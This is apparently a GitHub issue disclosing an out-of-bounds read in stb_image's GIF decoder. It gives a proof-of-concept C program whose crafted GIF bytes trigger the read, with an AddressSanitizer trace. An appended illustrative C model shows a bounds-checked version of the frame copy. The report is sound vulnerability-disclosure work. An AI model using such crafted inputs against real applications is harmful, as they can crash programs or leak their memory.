Open JarLob opened 9 months ago
A crafted image file may trigger out of bounds memcpy read in stbi__gif_load_next. This happens because two_back points to a memory address lower than the start of the buffer out.
This issue may be used to leak internal memory allocation information.
To reproduce the issue:
```c
#include <stdint.h>
#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[])
{
    /* Crafted GIF that triggers the out-of-bounds read */
    const uint8_t data[] = {0x47,0x49,0x46,0x38,0x39,0x61,0xbd,0x00,0xdf,0x79,0xa9,0x97,0x53,
                            0x43,0x05,0xff,0xbe,0x21,0x00,0x30,0x03,0x01,0x00,0x21,0x00,0x2c,
                            0x00,0x00,0x00,0x00,0xbd,0x00,0x3f,0x71,0x07,0x00,0x05,0xff,0xbe,
                            0x01,0x00,0x68,0x00,0x21,0xf9,0x04,0x2c,0x0a,0x00,0x1f,0x00,0x2c,
                            0x00,0x00,0x00,0x00,0xbd,0x00,0x71,0x00,0x00,0x05,0xff,0xe0,0x27,
                            0x8e,0x64,0x68};
    size_t size = sizeof(data);
    int x, y, z, channels;
    /* Decode all frames of the animated GIF from memory, requesting 4 channels */
    stbi_uc *img = stbi_load_gif_from_memory(data, size, NULL, &x, &y, &z, &channels, 4);
    stbi_image_free(img);
    return 0;
}
```
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==34019==ERROR: AddressSanitizer: SEGV on unknown address 0x7efdf91e0ae8 (pc 0x7efe05a0ac23 bp 0x7ffd4ee08700 sp 0x7ffd4ee07ec8 T0)
==34019==The signal is caused by a READ memory access.
    #2 0x4e4156 in stbi__gif_load_next(stbi__context*, stbi__gif*, int*, int, unsigned char*) tests/../stb_image.h:6817:16
    #3 0x4dee75 in stbi__load_gif_main(stbi__context*, int**, int*, int*, int*, int*, int) tests/../stb_image.h:6983:14
    #4 0x4de8bd in stbi_load_gif_from_memory tests/../stb_image.h:1448:30
```
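As an added example that is not part of this report or of stb_image, the C model below shows the arithmetic the report describes: a frame-history buffer where the "two back" frame must be located as an offset from the start of `out`, next to the offset a "two strides before `out`" computation would produce, and a disposal copy that checks both frames against the buffer before calling memcpy. All function names, the frame layout and the sample data are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Illustrative model, not stb_image's code: `out` holds decoded GIF frames of
 * `stride` bytes back to back, `layers` of them so far. */

/* Frame two back from the one decoded next, as an offset from the start of
 * `out`; -1 when fewer than two frames exist (hypothetical helper). */
static ptrdiff_t two_back_offset(int layers, ptrdiff_t stride) {
    if (layers < 2 || stride <= 0) return -1;
    return (ptrdiff_t)(layers - 2) * stride;
}

/* Offset implied by "two strides before out", kept as an integer so no
 * out-of-range pointer is ever formed while checking it. */
static ptrdiff_t before_start_offset(ptrdiff_t stride) { return -2 * stride; }

/* True if [off, off+len) lies inside a buffer of `total` bytes. */
static int range_in_bounds(ptrdiff_t off, size_t len, size_t total) {
    if (off < 0 || (size_t)off > total) return 0;
    return len <= total - (size_t)off;
}

/* Bounds-checked form of the disposal loop in the stack trace: copy each pixel
 * flagged in `history` (4 bytes) from frame `src_off` into frame `dst_off`.
 * Returns pixels copied, or -1 if either frame lies outside `out`. */
static int restore_from_history(uint8_t *out, size_t total, ptrdiff_t stride,
                                ptrdiff_t src_off, ptrdiff_t dst_off,
                                const uint8_t *history, int pcount) {
    if (pcount < 0 || (size_t)pcount * 4 > (size_t)stride) return -1;
    if (!range_in_bounds(src_off, (size_t)stride, total) ||
        !range_in_bounds(dst_off, (size_t)stride, total)) return -1;
    int copied = 0;
    for (int pi = 0; pi < pcount; ++pi)
        if (history[pi]) { memcpy(out + dst_off + pi * 4, out + src_off + pi * 4, 4); ++copied; }
    return copied;
}

/* Constructed scenario: 3 frames of 4 RGBA pixels decoded, frame 1 filled with
 * 0xAA; pixels 0 and 2 of new frame 3 are restored from two frames back. */
static int demo(void) {
    uint8_t out[64] = {0}, history[4] = {1, 0, 1, 0};
    ptrdiff_t stride = 16, src = two_back_offset(3, stride), dst = 3 * stride;
    memset(out + 16, 0xAA, 16);
    int n = restore_from_history(out, sizeof out, stride, src, dst, history, 4);
    return (n == 2 && out[48] == 0xAA && out[52] == 0 && out[56] == 0xAA && out[60] == 0) ? n : -1;
}

int main(void) {
    printf("restored %d pixels; before-start source in bounds: %d\n",
           demo(), range_in_bounds(before_start_offset(16), 16, 64));
    return 0;
}
```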